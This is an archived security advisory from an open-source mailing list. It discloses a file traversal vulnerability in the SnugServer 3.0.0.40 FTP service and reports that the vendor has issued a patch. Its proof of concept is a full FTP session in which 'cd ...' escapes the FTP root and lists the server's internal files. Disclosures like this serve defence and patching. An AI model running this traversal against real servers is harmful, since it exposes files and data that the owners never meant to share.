lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <52fae8f7.c5482a77.82f0800@saruman.inter.net.il>
From: muts at zahav.net.il (muts@...av.net.il)
Subject: Remotely exploitable file traversal vulnerability
 in SnugServer 3.0.0.40 FTP Service

See Security, Research and Development
www.see-security.com
------------------------------------------------------

[-] Product Information

SnugServer - All your Software Servers in 1 Application.
Upload and download files to/from the Internet. Unique 
firewall file system where your FTP files can be stored in a 
data file to prevent internal network hacker attacks. Product 
Homepage: http://www.snugserver.com/

[-] Vulnerability Description

A file traversal vulnerability has been discovered in 
SnugServer 3.0.0.40 FTP Service, which allows access to the 
server filesystem, outside of ftproot.

[-]PoC

root@...ppix:/# ftp 192.168.1.154
Connected to 192.168.1.154.
220-
 Welcome FTP User. SnugServer is ready. 
 Name (192.168.1.154:root): muts@...ault.com
331  Password required for muts@...ault.com.
Password:
230  See FTP Server 
Remote system type is You.
ftp> ls
200  PORT Command Successful. 
150  Opening ASCII mode data connection for directory listing.
 drw-rw-rw-   1 owner    group            0  Jan 21 03:51 ..
 drw-rw-rw-   1 owner    group            0  Jan 21 02:08 dir
226  Transfer Complete.
ftp> cd ...
200  PORT Command Successful.
ftp> ls
200  PORT Command Successful. 
150  Opening ASCII mode data connection for directory listing.
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 ..
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Cert
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Logs
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Requests
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Scripts
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Errors
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Queue
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 www
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Infected
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Temp
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 Filtered
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 BaseData
-rw-rw-rw-   1 owner    group 8421376  Jan 21 03:52 SNUG.FDB
drw-rw-rw-   1 owner    group      0  Jan 21 03:51 ftp
-rw-rw-rw-   1 owner    group 1861120  Jan 21 03:52 Snug.gbk
-rw-rw-rw-   1 owner    group   32  Jan 21 03:52 yarrow.rnd
226  Transfer Complete.
ftp>
 
[-] Patch

The vendor has been notified, and an update is available at:
 
http://www.snugserver.com/download.php

[-] Credits

This vulnerability was discovered by muts

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ